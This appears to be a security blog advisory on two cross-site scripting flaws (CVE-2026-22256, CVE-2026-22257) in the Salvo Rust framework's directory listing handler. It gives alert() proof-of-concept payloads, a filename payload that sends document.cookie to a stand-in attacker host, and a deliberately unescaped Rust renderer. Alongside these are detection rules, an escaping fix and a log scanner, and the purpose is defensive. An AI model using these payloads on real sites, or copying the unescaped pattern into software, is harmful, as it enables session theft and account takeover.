CVE-2026-22256 & CVE-2026-22257: Multiple High-Risk XSS Flaws Identified in Salvo Framework

Product: Salvo (Rust Web Framework)
Vulnerability Type: Cross-Site Scripting (XSS)
Affected Component: list_html directory listing handler
Impact: Client-side code execution, session compromise, account takeover, cross-user attacks


CVE-2026-22256 — Reflected Cross-Site Scripting (XSS)

Overview

CVE-2026-22256 is a reflected XSS vulnerability in the Salvo web framework. It occurs when the framework generates HTML directory listings and embeds parts of the incoming HTTP request path directly into the HTML response without HTML-escaping them first.

Because the request path is fully attacker-controlled, a malicious user can inject JavaScript or HTML into a crafted URL. When a victim opens that link, the injected script executes in the victim’s browser under the context of the affected website.


CVSS Score

8.8 (High)


Severity

High


Exploitability Summary

  • Attack vector: Remote (network-based)
  • Attack complexity: Low
  • Privileges required: None
  • User interaction: Required (victim must click a crafted link)
  • Impact: Session hijacking, credential theft, unauthorized actions

How the Vulnerability Works

Salvo’s list_html function generates directory listings for file paths. During this process:

  • The current request path is decoded and normalized
  • That decoded value is embedded into the HTML output
  • No output encoding or HTML escaping is applied

If the request path contains HTML or JavaScript payloads, they are reflected verbatim into the rendered page.

The browser treats the injected content as trusted site content, allowing the script to execute.


Example Exploitation Flow (Educational)

  1. Attacker crafts a URL containing encoded JavaScript in the path: /files/%3Cscript%3Ealert(document.cookie)%3C/script%3E
  2. Victim clicks the link (email, chat, forum, etc.)
  3. Salvo renders the directory listing page
  4. The injected script executes in the victim’s browser

This can be extended to steal cookies, manipulate page content, or silently perform authenticated actions.


Proof of Concept (Educational Only)

A basic reflected XSS payload:

<script>alert('XSS')</script>

Encoded for URL use:

%3Cscript%3Ealert('XSS')%3C/script%3E

This is not a weaponized exploit, but it demonstrates the impact clearly.


MITRE Mapping

  • CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)
  • ATT&CK Context: Exploit Public-Facing Application

Detection & Monitoring

Relevant Log Sources

  • Web server access logs (URI paths)
  • Reverse proxy / load balancer logs
  • Application request logs
  • WAF logs
  • Browser error telemetry (if collected server-side)

Indicators of Exploitation

Look for:

  • URL paths containing encoded or decoded HTML characters:
    • %3C, %3E, <, >
  • JavaScript keywords in request paths:
    • script, onerror, onload, javascript:
  • Unusual request paths leading to directory listing endpoints

Example Detection Queries

Search access logs for request paths containing:

%3Cscript
<script
onerror=
onload=
javascript:

Example IDS / WAF Rule

IF request.uri CONTAINS "<script" OR "%3Cscript"
THEN alert "Possible reflected XSS attempt against Salvo"

This rule should be tuned to reduce false positives.


CVE-2026-22257 — Stored Cross-Site Scripting (XSS)


Overview

CVE-2026-22257 is a stored (persistent) XSS vulnerability affecting the same list_html functionality. Instead of the request path, the attack vector is file and directory names.

If an attacker can upload or create files with specially crafted names, those names are later rendered into the HTML directory listing without sanitization. Any user who views the listing will trigger the payload.


CVSS Score

8.8 (High)


Severity

High


Exploitability Summary

  • Attack vector: Remote
  • Attack complexity: Low
  • Privileges required: None (if uploads are public)
  • User interaction: Viewing the directory listing
  • Impact: Cross-user compromise, persistent session theft

How the Vulnerability Works

When Salvo renders directory listings:

  • File and folder names are retrieved from disk
  • Names are injected directly into HTML output
  • No HTML escaping is performed

An attacker uploads a file with a malicious filename. That filename becomes executable content in the browser of anyone who views the directory listing.

This makes it more dangerous than reflected XSS because:

  • The payload persists
  • Multiple users can be affected
  • No attacker interaction is required after upload
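The unescaped-concatenation pattern described for both CVEs (the decoded request path for CVE-2026-22256, on-disk file names for CVE-2026-22257) is shown below beside a hardened renderer. This is an added example written for this page; it is not Salvo's code and not the upstream patch, and the names `html_escape`, `percent_encode`, `render_listing_unescaped`, `render_listing_escaped` and `contains_raw_script` are chosen here for illustration. The sample path and file name are the payloads quoted in this advisory.

```rust
// Added example, not Salvo's own code and not the upstream patch: a minimal
// directory-listing renderer showing the unescaped concatenation pattern the
// advisory describes (request path and file names dropped straight into the
// markup) beside a hardened version that encodes each value for its context.

/// Escape the characters that are significant in HTML text and attribute values.
pub fn html_escape(input: &str) -> String {
    let mut out = String::with_capacity(input.len());
    for c in input.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#x27;"),
            _ => out.push(c),
        }
    }
    out
}

/// Percent-encode a single path segment for use in an href. Everything except
/// RFC 3986 unreserved characters is encoded, so no HTML-significant byte survives.
pub fn percent_encode(segment: &str) -> String {
    let mut out = String::with_capacity(segment.len());
    for b in segment.bytes() {
        match b {
            b'A'..=b'Z' | b'a'..=b'z' | b'0'..=b'9' | b'-' | b'.' | b'_' | b'~' => out.push(b as char),
            _ => out.push_str(&format!("%{:02X}", b)),
        }
    }
    out
}

/// Vulnerable pattern (the shape described for CVE-2026-22256 / CVE-2026-22257):
/// the decoded request path and the on-disk names are written into the page verbatim.
pub fn render_listing_unescaped(path: &str, entries: &[&str]) -> String {
    let mut html = format!("<h1>Index of {}</h1>\n<ul>\n", path);
    for name in entries {
        html.push_str(&format!("<li><a href=\"{}\">{}</a></li>\n", name, name));
    }
    html.push_str("</ul>\n");
    html
}

/// Hardened pattern: HTML-escape values placed in text context and
/// percent-encode the value placed in the href attribute.
pub fn render_listing_escaped(path: &str, entries: &[&str]) -> String {
    let mut html = format!("<h1>Index of {}</h1>\n<ul>\n", html_escape(path));
    for name in entries {
        html.push_str(&format!(
            "<li><a href=\"{}\">{}</a></li>\n",
            percent_encode(name),
            html_escape(name)
        ));
    }
    html.push_str("</ul>\n");
    html
}

/// True if a raw <script> tag reached the rendered markup, i.e. the payload survived.
pub fn contains_raw_script(html: &str) -> bool {
    html.to_ascii_lowercase().contains("<script")
}

fn main() {
    // Constructed inputs: the payloads quoted in the advisory.
    let path = "/files/<script>alert('XSS')</script>";
    let entries = ["notes.txt", "\"><script>alert('Stored XSS')</script>"];

    let vulnerable = render_listing_unescaped(path, &entries);
    let hardened = render_listing_escaped(path, &entries);

    println!("--- unescaped (payload survives: {}) ---\n{}", contains_raw_script(&vulnerable), vulnerable);
    println!("--- escaped (payload survives: {}) ---\n{}", contains_raw_script(&hardened), hardened);
}
```

The point of the split between `html_escape` and `percent_encode` is that the same untrusted string lands in two different contexts (link text and an href attribute) and each needs its own encoder; a single "sanitize" pass applied to the file name before rendering would not cover both. The actual remediation is the 0.88.1 upgrade given under Mitigation; this snippet only illustrates the principle behind it.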

Example Exploitation Flow (Educational)

  1. Attacker uploads a file named: "><script>fetch('https://attacker.site/?c='+document.cookie)</script>.txt
  2. Application stores the file normally
  3. A legitimate user visits the directory listing
  4. The browser executes the embedded script automatically

Proof of Concept (Educational Only)

Filename payload:

"><script>alert('Stored XSS')</script>

Encoded versions may also be used to bypass upload filters.


MITRE Mapping

  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • ATT&CK Context: Exploit Public-Facing Application

Detection & Monitoring

Relevant Log Sources

  • File upload logs
  • Storage metadata (filenames)
  • Application logs for directory listing requests
  • Web server logs
  • WAF logs

Indicators of Stored XSS

  • Filenames containing:
    • <, >
    • %3C, %3E
    • script, svg, img
    • Event handlers (onerror, onload)
  • Repeated access to directory listing pages following uploads
  • Browser-side script execution originating from listing pages

Example Filename Detection Rule

IF uploaded_filename MATCHES /(<|%3C).*(script|svg|img)/i
THEN flag as potential stored XSS
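The access-log search terms and WAF rule given for CVE-2026-22256, and the filename rule just above for CVE-2026-22257, are implemented together below as an added, std-only Rust example; it is not part of the advisory and not a Salvo component. The names `percent_decode_once`, `normalize`, `uri_is_suspicious`, `filename_is_suspicious`, `uri_from_access_log` and `scan_access_log` are chosen for this example, and the log lines are constructed in combined-log format. The one thing it adds to the rules as written is normalization: both the URI and the file name are percent-decoded (repeatedly, with a bound) and lowercased before matching, so `%3Cscript`, `%253Cscript` and `<SCRIPT` all hit the same rule instead of needing separate patterns.

```rust
// Added example, not from the advisory or from Salvo: applies the advisory's
// URI indicators and filename rule to constructed log data, after percent-
// decoding so encoded variants are matched as well.

fn hex_val(b: u8) -> Option<u8> {
    match b {
        b'0'..=b'9' => Some(b - b'0'),
        b'a'..=b'f' => Some(b - b'a' + 10),
        b'A'..=b'F' => Some(b - b'A' + 10),
        _ => None,
    }
}

/// Decode %XX sequences once; malformed sequences are kept verbatim.
pub fn percent_decode_once(s: &str) -> String {
    let bytes = s.as_bytes();
    let mut out = Vec::with_capacity(bytes.len());
    let mut i = 0;
    while i < bytes.len() {
        if bytes[i] == b'%' && i + 2 < bytes.len() {
            if let (Some(h), Some(l)) = (hex_val(bytes[i + 1]), hex_val(bytes[i + 2])) {
                out.push(h * 16 + l);
                i += 3;
                continue;
            }
        }
        out.push(bytes[i]);
        i += 1;
    }
    String::from_utf8_lossy(&out).into_owned()
}

/// Decode until the string stops changing (bounded) so double encoding such as
/// %253C does not slip past a pattern written for %3C, then lowercase.
pub fn normalize(s: &str) -> String {
    let mut cur = s.to_string();
    for _ in 0..3 {
        let next = percent_decode_once(&cur);
        if next == cur {
            break;
        }
        cur = next;
    }
    cur.to_ascii_lowercase()
}

/// The search terms listed under "Example Detection Queries".
const URI_INDICATORS: [&str; 4] = ["<script", "onerror=", "onload=", "javascript:"];

/// Reflected-XSS rule: returns the first indicator found in the normalized URI.
pub fn uri_is_suspicious(uri: &str) -> Option<&'static str> {
    let n = normalize(uri);
    URI_INDICATORS.iter().copied().find(|ind| n.contains(*ind))
}

/// Filename rule /(<|%3C).*(script|svg|img)/i, without a regex crate:
/// a '<' (after decoding) followed somewhere later by one of the tag names.
pub fn filename_is_suspicious(name: &str) -> bool {
    let n = normalize(name);
    match n.find('<') {
        Some(pos) => {
            let rest = &n[pos + 1..];
            ["script", "svg", "img"].iter().any(|t| rest.contains(*t))
        }
        None => false,
    }
}

/// Pull the request target out of the first double-quoted field ("GET /path HTTP/1.1").
pub fn uri_from_access_log(line: &str) -> Option<&str> {
    let start = line.find('"')? + 1;
    let end = start + line[start..].find('"')?;
    line[start..end].split(' ').nth(1)
}

/// Returns (1-based line number, matched indicator) for every suspicious request.
pub fn scan_access_log(log: &str) -> Vec<(usize, &'static str)> {
    log.lines()
        .enumerate()
        .filter_map(|(i, line)| {
            let uri = uri_from_access_log(line)?;
            uri_is_suspicious(uri).map(|ind| (i + 1, ind))
        })
        .collect()
}

/// Constructed access-log sample: one benign listing request, the advisory's
/// encoded payload, a double-encoded variant, and a benign near-miss.
const SAMPLE_LOG: &str = "\
10.0.0.5 - - [01/Jan/2026:10:00:00 +0000] \"GET /files/ HTTP/1.1\" 200 512
10.0.0.7 - - [01/Jan/2026:10:00:01 +0000] \"GET /files/%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1\" 200 640
10.0.0.9 - - [01/Jan/2026:10:00:02 +0000] \"GET /files/%253Cscript%253E HTTP/1.1\" 200 640
10.0.0.4 - - [01/Jan/2026:10:00:03 +0000] \"GET /files/report-onload.txt HTTP/1.1\" 200 128
";

fn main() {
    for (line_no, indicator) in scan_access_log(SAMPLE_LOG) {
        println!("access log line {}: possible reflected XSS attempt ({})", line_no, indicator);
    }
    // Constructed upload names: the advisory's payload, an encoded variant, and benign near-misses.
    for name in ["\"><script>alert('Stored XSS')</script>", "%3Cimg src=x%3E.png", "svg-icons.zip", "report.txt"] {
        let verdict = if filename_is_suspicious(name) { "FLAG" } else { "ok" };
        println!("filename {:?}: {}", name, verdict);
    }
}
```

Lines 2 and 3 of the sample are flagged and lines 1 and 4 are not; `report-onload.txt` is the kind of benign path the tuning note above refers to, and it passes only because the indicator is `onload=` rather than the bare word. The decode bound of three passes is a deliberate limit: unbounded decoding of attacker-controlled strings is itself a way to make a detector spend time, so pick a small fixed number and keep it.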

Impact Summary (Both CVEs)

If successfully exploited, attackers may:

  • Steal session cookies
  • Perform actions as logged-in users
  • Deface pages
  • Inject malicious redirects
  • Launch follow-up attacks such as phishing or malware delivery

Mitigation & Remediation

Primary Fix

Upgrade Salvo to version 0.88.1 or later

Official patch / upgrade link:

https://github.com/salvo-rs/salvo/releases/tag/v0.88.1

Additional Defensive Measures

  • Disable directory listing if not required
  • Restrict file upload permissions
  • Enforce filename validation and normalization
  • Apply strict output encoding when rendering user-controlled content
  • Deploy a Content Security Policy (CSP) to reduce script execution impact
  • Use WAF rules to block encoded HTML in URLs and filenames

Final Takeaway

  • These vulnerabilities are easy to exploit once discovered
  • Absence of public exploit code does not mean low risk
  • Stored XSS should be treated as critical in multi-user environments
  • Patch deployment should be prioritized for all internet-facing services

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.